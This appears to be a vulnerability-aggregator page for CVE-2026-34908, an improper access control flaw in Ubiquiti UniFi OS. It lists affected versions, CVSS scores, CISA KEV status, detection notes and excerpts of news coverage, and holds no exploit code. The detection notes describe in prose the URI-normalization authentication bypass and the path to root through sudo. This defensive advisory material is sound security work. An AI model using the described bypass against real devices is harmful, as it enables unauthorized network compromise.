CVE-2026-34908
published 2026-05-22CVE-2026-34908: A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized changes to…
PriorityP192critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
KEVITW
CISA Known Exploited Vulnerabilitydue 2026-06-26
Exploited in the wild
EPSS
2.45%
82.4th percentile
A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized changes to the system.
Affected
62 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ubiquiti_inc | efg | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | envr | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | envr-core | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | express_7 | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | ucg-fiber | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | ucg-industrial | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | ucg-max | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | ucg-ultra | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | uck | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | uck-enterprise | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | uckp | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udm | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udm-beast | < 5.1.11 | 5.1.11 |
| ubiquiti_inc | udm-pro | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udm-pro-max | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udm-se | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udr | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udr-5g | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udr7 | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udw | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | unas-2 | < 5.1.10 | 5.1.10 |
| ubiquiti_inc | unas-4 | < 5.1.10 | 5.1.10 |
| ubiquiti_inc | unas-pro | < 5.1.10 | 5.1.10 |
| ubiquiti_inc | unas-pro-4 | < 5.1.10 | 5.1.10 |
| ubiquiti_inc | unas-pro-8 | < 5.1.10 | 5.1.10 |
Detection & IOCsextracted from sources · hover to see the quote
- →The authentication bypass exploits a mismatch between how UniFi OS validates and routes requests: the authentication component evaluates the raw request URI, while Nginx routes based on a normalized URI. Craft detection for requests that target authentication-exempt endpoints in raw form but resolve to protected internal routes after normalization. ↗
- →Privilege escalation to root is trivial because the affected service account has passwordless sudo access to several system binaries. Monitor for unexpected sudo commands originating from the ucs-update service account. ↗
- →Bishop Fox released a free detection script on GitHub that safely sends a specially crafted request to the vulnerable code path without executing dangerous commands, classifying the target as 'vulnerable,' 'patched,' 'unaffected,' or 'inconclusive.' Use this to identify unpatched instances. ↗
- →Successful compromise of UniFi OS devices can enable lateral movement across the broader network, including physical-access doors, surveillance cameras, and identity systems governed by the console. Treat any UniFi OS compromise as a full network-level incident. ↗
- ·CVE-2026-34908 is part of a three-CVE chain (CVE-2026-34908, CVE-2026-34909, CVE-2026-34910). All three must be patched together; patching only CVE-2026-34908 in isolation does not eliminate the full unauthenticated RCE risk. ↗
- ·The affected scope is UniFi OS Server versions 5.0.6 and earlier. Versions 5.0.8 and later are confirmed unaffected by the full exploit chain. ↗
- ·The detection script from Bishop Fox does NOT detect active attacks, past exploitation, or the presence of persistence mechanisms or backdoors — only whether the instance is currently vulnerable. ↗
CVSS provenance
nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck10.0CRITICAL
cisa10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Ubiquiti UniFi OS Server prior 5.0.8 access control (WID-SEC-2026-1639)
vuldb·2026-06-23·CVSS 10.0
CVE-2026-34908 [CRITICAL] Ubiquiti UniFi OS Server prior 5.0.8 access control (WID-SEC-2026-1639)
A vulnerability identified as critical has been detected in Ubiquiti UniFi OS Server, UDM, UDM-Pro, UDM-SE, UDM-Pro-Max, UDM-Beast, EFG, UDW, UDR, UDR7, UDR-5G, Express 7, UNVR, UNVR-Pro, UNVR-Instant, UNVR-G2, UNVR-G2-Pro, ENVR, ENVR-Core, UNAS-2, UNAS-4, UNAS-Pro, UNAS-Pro-4, UNAS-Pro-8, UCKP, UCK, UCK-Enterprise, UCG-Ultra, UCG-Max, UCG-Fiber and UCG-Industrial. This vulnerability affects unknown code. Performing a manipulation results in improper access controls.
This vulnerability is known as CVE-2026-34908. Remote exploitation of the attack is possible. Furthermore, an exploit is available.
You should upgrade the affected component.
GHSA
GHSA-p8c5-xwrc-584f: A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized cha
ghsa_unreviewed·2026-05-22
CVE-2026-34908 [CRITICAL] CWE-284 GHSA-p8c5-xwrc-584f: A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized cha
A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized changes to the system.
VulnCheck
Improper Access Control
vulncheck·2026·CVSS 10.0
CVE-2026-34908 [CRITICAL] Improper Access Control
Improper Access Control
A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized changes to the system.
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.pwndefend.com/2026/06/09/cve-2026-34910-exploitation-itw-building-a-botnet-mirai/
CISA
Ubiquiti UniFi OS Improper Access Control Vulnerability
cisa·2026-06-23·CVSS 10.0
CVE-2026-34908 [CRITICAL] CWE-284 Ubiquiti UniFi OS Improper Access Control Vulnerability
Vulnerability: Ubiquiti UniFi OS Improper Access Control Vulnerability
Affected: Ubiquiti UniFi OS
Ubiquiti UniFi OS contains an improper access control vulnerability which could allow a malicious actor with access to the network to make unauthorized changes to the system.
Required Action: Apply mitigations in accordance with vendor instructions, ensuring compliance with CISA’s BOD 26-04 Prioritizing Security Updates Based on Risk (see URL in Notes) guidance and CISA’s “Forensics Triage Requirements” (see URL in Notes). Follow applicable BOD 26-04 guidance for cloud services or discontinue use of the product if mitigations are unavailable. Stakeholders are responsible for evaluating each asset's internet exposure and ensuring adherence to BOD 26-04 patching guidelines.
Notes: https://co
No detection rules found.
No public exploits indexed.
Checkpoint
29th June – Threat Intelligence Report
blogs_checkpoint·2026-06-29
CVE-2026-20245 29th June – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 29th June – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 29th June, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Polymarket, a large cryptocurrency-based prediction market, has confirmed a supply chain attack after a third-party frontend vendor breach led to malicious JavaScript being injected into its website. Attackers tricked users into approving fraudulent transactions, stealing about $3 million from fewer than 15 accounts, while the b
Hackernews
CISA Warns Critical Lantronix EDS5000 Flaw Is Being Actively Exploited
blogs_hackernews·2026-06-24·CVSS 9.8
CVE-2025-67038 [CRITICAL] CISA Warns Critical Lantronix EDS5000 Flaw Is Being Actively Exploited
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## CISA Warns Critical Lantronix EDS5000 Flaw Is Being Actively Exploited
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday warned of active exploitation of a critical security flaw impacting Lantronix EDS5000 Series devices, urging Federal Civilian Executive Branch (FCEB) agencies to apply the fixes by June 26, 2026.
The vulnerability in question is CVE-2025-67038 (CVSS score: 9.8), a code injection flaw that could result in the execution of arbitrary commands with elevated privileges.
"The HTTP RPC module executes a shell command to write logs when the user's authentication fails," according to the
Bleepingcomputer
CISA warns of max severity Ubiquiti flaws exploited in attacks
blogs_bleepingcomputer·2026-06-24·CVSS 9.8
CVE-2026-34908 [CRITICAL] CISA warns of max severity Ubiquiti flaws exploited in attacks
## CISA warns of max severity Ubiquiti flaws exploited in attacks
## Bill Toulas
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of hackers actively exploiting flaws in Ubiquity UniFi OS and Lantronix serial-to-ethernet servers.
According to the BOD 26-04 directive , federal agencies have three days to apply available security updates or vendor-recommended mitigations.
The Ubiquiti flaws that CISA added to its catalog of Known Exploited Vulnerabilities are:
CVE-2026-34908 : an access control bypass flaw that allows an unauthenticated attacker to make unauthorized changes to a UniFi OS system, potentially leading to full system compromise.
CVE-2026-34909 : a directory/path traversal vulnerability that allows an attacker to access sensitive files on the unde
Hackernews
⚡ Weekly Recap: Chrome 0-Day, UniFi Exploits, macOS Stealers, VPN Flaw and More
blogs_hackernews·2026-06-15·CVSS 8.8
CVE-2026-11645 [HIGH] ⚡ Weekly Recap: Chrome 0-Day, UniFi Exploits, macOS Stealers, VPN Flaw and More
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## ⚡ Weekly Recap: Chrome 0-Day, UniFi Exploits, macOS Stealers, VPN Flaw and More
Stuff broke again. Not in a movie way. An old tool was left exposed. An abandoned package was abused. A deprecated feature was still running in prod.
This week is the same lesson in a new form: phishing kits are easier to rent, AI names are useful bait, old login paths still fail, and forgotten software keeps becoming someone else's entry point.
Scroll through the full Monday Cybersecurity Recap below for the news, tools, webinars, and fixes worth your time this week.
## ⚡ Threat of the Week
Google Patches Actively Exploited Chrome 0-Day - G
Hackernews
⚡ Weekly Recap: Instagram Account Hacks, Android Zero-Day, GitHub Worm and More
blogs_hackernews·2026-06-08·CVSS 8.4
CVE-2025-48595 [HIGH] ⚡ Weekly Recap: Instagram Account Hacks, Android Zero-Day, GitHub Worm and More
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## ⚡ Weekly Recap: Instagram Account Hacks, Android Zero-Day, GitHub Worm and More
Monday again. The weekend was meant to be quiet. It wasn't. Last week had poisoned packages, a broken AI helper, and a worm tearing through repos. The ugly part: basic tricks still worked.
A chatbot got fooled. A bot token got leaked inside the malware. The same old mistakes showed up again. And while everyone chased the loud stuff, quieter attackers sat in inboxes for months, reading mail and stealing it bit by bit.
Lots to cover. Grab coffee. Read up.
## ⚡ Threat of the Week
Miasma Worm Hits 73 Microsoft GitHub Repositories in Supply Chain
Bleepingcomputer
Critical UniFi OS bug lets hackers gain root without authentication
blogs_bleepingcomputer·2026-06-08·CVSS 10.0
CVE-2026-34908 [CRITICAL] Critical UniFi OS bug lets hackers gain root without authentication
## Critical UniFi OS bug lets hackers gain root without authentication
## Bill Toulas
Attackers can chain three already fixed vulnerabilities in the Ubiquiti UniFi OS server to execute remote code with root privileges and without authentication.
The security issues are tracked as CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910. They have been addressed in May and impact UniFi OS Server versions 5.0.6 and earlier.
While all three flaws received the maximum severity rating despite their exploitation requiring access to the network, the vendor's advisory did not mention that they could be chained for remote code execution.
CVE-2026-34908 is an improper access control flaw that can allow unauthorized changes to vulnerable systems
CVE-2026-34909 is a path traversal vulnerability that c
Hackernews
⚡ Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos
blogs_hackernews·2026-05-25
CVE-2026-46333 ⚡ Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## ⚡ Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos
Monday recap. Same mess, new week.
A sketchy dev tool got people pwned, old bugs came back from the dead, and security products somehow needed protecting from themselves. A bunch of companies spent the week checking old boxes and forgotten servers they should've patched years ago. Good times.
Phishing crews are getting smarter too - less obvious scam junk, more targeted stuff that actually looks real. Meanwhile, botnets are grabbing anything exposed to the internet like it's free candy. The Internet's still a dumpster fire.
Let’s get into
Bleepingcomputer
Ubiquiti patches three max severity UniFi OS vulnerabilities
blogs_bleepingcomputer·2026-05-22·CVSS 10.0
CVE-2026-34908 [CRITICAL] Ubiquiti patches three max severity UniFi OS vulnerabilities
## Ubiquiti patches three max severity UniFi OS vulnerabilities
## Sergiu Gatlan
Ubiquiti has released security updates to patch three maximum severity vulnerabilities in UniFi OS that can be exploited by remote attackers without privileges.
UniFi OS is a unified operating system that powers UniFi Consoles and helps manage IT infrastructure, including networking, security, and other services, as well as UniFi applications such as UniFi Network, UniFi Protect, UniFi Access, UniFi Talk, and UniFi Connect.
The first flaw ( CVE-2026-34908 ) enables attackers to make unauthorized changes to targeted systems by exploiting an Improper Access Control weakness in UniFi OS, while the second ( CVE-2026-34909 ) allows them to access files on the underlying system by abusing a Path Traversal vulner
2026-05-22
Published
2026-06-23
Added to CISA KEV
Exploited in the wild